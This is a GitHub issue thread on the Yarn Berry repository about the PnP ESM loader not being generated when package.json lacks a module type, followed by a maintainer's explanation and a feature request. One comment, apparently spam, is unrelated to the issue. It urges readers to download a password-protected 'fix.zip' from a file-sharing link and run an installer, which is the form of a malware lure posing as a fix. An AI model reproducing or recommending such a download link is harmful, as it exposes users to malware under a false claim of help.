### ISSUE TITLE
[feat] home config option to enforce create esm loader

### ISSUE THREAD

**Issue by loynoir** [yarnpkg/berry#6472]
### Self-service

- [ ] I'd be willing to implement a fix

### Describe the bug

`yarn install` may not init `.pnp.loader.mjs` may leads to bug

## actual

`package.json` without `"type": "module"` don't init `.pnp.loader.mjs`.

So, when later call `test.mjs`, BOOM!

```json
{
    "name": "tmp.UpMou44EU1",
    "packageManager": "yarn@4.4.1",
    "dependencies": {
        "undici": "^6.19.8"
    }
}
```

```sh
$ ls -A
package.json  test.mjs
```

```sh
$ yarn install
...
$ ls -A
.pnp.cjs  .yarn  package.json  test.mjs  yarn.lock
```

```sh
$ yarn node ./test.mjs
node:internal/modules/run_main:115
    triggerUncaughtException(
    ^

Error [ERR_MODULE_NOT_FOUND]: Cannot find package 'undici' imported from /tmp/tmp.sRdHNcatDn/test.mjs
Did you mean to import "undici/index.js"?
...
```

## expected

`package.json` without `"type": "module"`

- or should init `.pnp.loader.mjs` when `yarn intall`

- or should init `.pnp.loader.mjs` when call `XXX.mjs`

```json
{
    "name": "tmp.UpMou44EU1",
    "packageManager": "yarn@4.4.1",
    "type": "module",
    "dependencies": {
        "undici": "^6.19.8"
    }
}
```

```sh
$ yarn install
...
$ ls -A
.pnp.cjs  .pnp.loader.mjs  .yarn  package.json  test.mjs  yarn.lock
```

```sh
$ yarn node ./test.mjs
✔ fetch test: cgi with-content-length (16.735998ms)
✔ fetch test: cgi without-content-length (6.540652ms)
```

### Environment

```shell
node 22.5.0

yarn 4.4.1
```

### Additional context

Background: when testing https://github.com/nodejs/undici/issues/1688

**Comment by NhutDang2002** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by arcanis** [comment]
That's not a bug. Yarn will by default only install the PnP ESM loader if it detects the package.json type is `module`, or if any of the dependencies is ESM. It doesn't inspect your source files.

**Comment by loynoir** [comment]
> That's not a bug. Yarn will by default only install the PnP ESM loader if it detects the package.json type is `module`, or if any of the dependencies is ESM. It doesn't inspect your source files.

Then would be nice to have home config option to enforce yarn always init both cjs and esm loader for easy testing purpose. :)

For example

`~/.yarnrc.yml`

```yml
prefer_always_init_cjs_and_esm_loader: true
```
